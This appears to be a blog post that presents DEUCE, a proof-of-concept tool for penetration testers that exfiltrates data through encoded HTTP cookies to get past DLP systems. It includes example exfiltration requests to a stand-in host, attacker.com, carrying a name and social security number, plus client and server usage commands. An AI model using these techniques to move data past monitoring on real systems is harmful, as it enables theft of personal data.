In a recent B-sides event, there was a talk about the
exfiltration of data and Data Loss Prevention (DLP) systems. A known vector to
bypass DLP, is the use of NSLookup. The attacker requests a domain he controls
but adds a hostname that contains the data that needs to be sent outside the
controlled environment. This means if an attacker wanted to steal a name and
social security number he would request “johndoe123-45-1234.attacker.com” This
request would hit the DNS server and be logged thus creating a list of
identities for the attacker to mine at a later time. The maximum limit is 255 characters for this
kind of attack. This concept got me thinking what about a standard GET request
such as http://attacker.com/johndoe123-45-1234 this would make life easier for
the attacker. He would no longer need to control the DNS server; he would just
need to see what pages were requested. We would still be limited by the
character maximum and each request could be easily logged and analyzed by
proxies or alerting systems. But, let’s
be honest most DLP systems are going to alert on these types of requests, or at
least they should.
After some dialog with some friends, it was pointed out that
using cookies would be a great alternative. Cookies aren’t normally logged by proxies
or other systems. Also if the cookie was encoded or encrypted, as they normally
are it would keep the DLP and prying eyes at bay. As an added benefit we are no longer limited
by the 255 character maximum and one request could send many cookies.
DEUCE is written in python but could easily be converted to
an executable using py2exe or PyInstaller also the AES encryption
relies on PyCrypto.
Because this is just a proof of concept tool DEUCE does not currently support
SSL, but it may in the future.
Using DEUCE is simple. By default the server listens on all
interfaces and on port 80. The DEUCE client has more options such as encryption
and encoding methods, target URL and input file. Example usage below:
- python deuce_server.py -o ouput.txt
- This starts the listening server on all interfaces on port 80 with the output being output.txt
- python deuce_client.py -u http://location_of_deuce_server -i inputfile.txt -m
- This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.
Please feel free to test this concept in your environment;
obviously I do not have access to every possible solution out there. It is
important to note I am in no way responsible for how you use DEUCE. This tool
is designed to help penetration testers and assist users in testing their DLP
implementation. You are not permitted to use DEUCE for any illegal means.
Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake
Garlie (@_Jagar_) for listening to me
rant about this.
No comments:
Post a Comment